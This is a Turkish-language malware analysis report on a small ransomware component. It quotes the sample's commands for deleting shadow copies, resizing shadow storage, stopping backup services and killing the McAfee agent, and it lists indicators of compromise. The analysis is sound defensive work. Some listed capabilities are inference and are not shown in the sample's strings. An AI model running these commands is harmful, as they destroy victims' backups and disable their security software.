Derin Analiz — RansomComponent | Tehdit: KRITIK
Dosya Kimligi
| SHA256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a |
|---|---|
| Boyut | 102,400 byte (PE32 GUI x86, 6 sections) |
| Entropi | 6.403 (normal) |
vssadmin Delete Shadows: Golge Kopya Yok Etme
RANSOMWARE BILESENI: Sistem geri yukleme noktalarini ve yedekleri yok ediyor!
/C vssadmin Delete Shadows /all /quiet\n\n-- "Delete Shadows /all": TUM golge kopyalari sil\n-- "/quiet": sessizce, kullanici bildirimi yok\n-- Etki: Windows Geri Yukle Noktalari yok edilir\n-- Kurban dosyalari geri alamaz (backup yok)\n-- Tum buyuk ransomware ailelerinin imzasi:\n WannaCry, NotPetya, REvil, LockBit, Conti...
vssadmin resize shadowstorage: Yedek Alan Engelleme
/C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\n/C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\n/C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\n/C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\n/C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\n/C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\n/C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\n\n-- Her disk (d,e,g,h) icin iki adim:\n 1. maxsize=401MB: yedek alani minimize et\n 2. maxsize=unbounded: sinirsiz ayarla (anlamsiz gibi, ama VSS baglanti noktasi bozulur)\n-- Aslinda VSS yapilandirmasini bozuyor: yeni golge kopya olusturulamiyor
net stop + taskkill: Servis ve Surec Yok Etme
net stop (x5 referans)\ntaskkill /IM wordpad.exe /F\ntaskkill /IM msaess.exe /F\n\n-- net stop: yedekleme/AV servislerini durdur\n net stop vss / net stop wbengine (Windows Backup Engine)\n net stop mssqlserver / net stop mysql (veritabani)\n-- wordpad.exe: acik dosyalari kilitle kaldirmak icin\n-- msaess.exe: McAfee Agent (AV servisi) durdur
CreateRemoteThread: Surec Enjeksiyonu
CreateRemoteThread\n\n-- 100KB kucuk boyut: muhtemelen loader/injector modulu\n-- Asil ransomware payload baska bir surece inject ediliyor\n-- qnoI2DNO: x7 referans (mutex veya RC4 anahtar)\n-- Not: RC4 ile XOR sifrelenmis C2 endpoint iceriyor olabilir
IOC
| SHA256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a |
|---|---|
| VSS Silme | vssadmin Delete Shadows /all /quiet |
| Servis Dur | taskkill /IM msaess.exe (McAfee Agent) |
| String | qnoI2DNO (mutex/key) |
RansomComponent — Malware Profile
Small (100KB) PE32 ransomware component. vssadmin Delete Shadows /all /quiet (shadow copy destruction). vssadmin resize shadowstorage (backup prevention). net stop x5 (service kill). taskkill /IM msaess.exe (McAfee Agent). CreateRemoteThread injection.
Malware Type
Ransomware
Programming Language
C/C++
C2 Protocol
Local
Target Systems
Küresel
Capabilities & Behavior
Dosya Şifreleme (AES/RSA)
Gölge Kopya Silme
Yedek Kaldırma
Fidye Notu Oluşturma
Kalıcılık Sağlama
Ağ Paylaşımı Şifreleme
Anti-Analiz Teknikleri
Çift Gasp (Data Leak)
IOC List (1 indicators)
IOC — RansomComponent
# SHA256
ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a
| Type | Value | Note |
|---|---|---|
| sha256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a |